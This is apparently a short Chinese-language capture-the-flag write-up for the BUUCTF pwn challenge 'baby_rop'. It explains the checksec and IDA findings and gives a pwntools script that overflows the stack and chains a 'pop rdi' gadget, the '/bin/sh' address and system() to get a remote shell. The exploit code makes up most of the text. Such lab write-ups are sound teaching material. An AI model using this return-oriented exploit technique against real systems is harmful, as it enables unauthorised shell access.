[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop
先checksec一下,64位,开启NX保护
在IDA中看看,发现了system函数 和 "/bin/sh"字符串 ,找到地址
因为是64位参数是储存在寄存器中,binsh字符串应该放在 rdi 寄存器中
exploit
from pwn import *
p = remote("node3.buuoj.cn",26570)
binsh = 0x0601048
system_addr = 0x04005E3
pop_rdi = 0x0400683
payload = 'a' * (0x10 + 0x8) + p64(pop_rdi) + p64(binsh) + p64(system_addr)
p.sendline(payload)
p.interactive()
不知道有没有人和我一样找不到flag, 哈哈哈哈.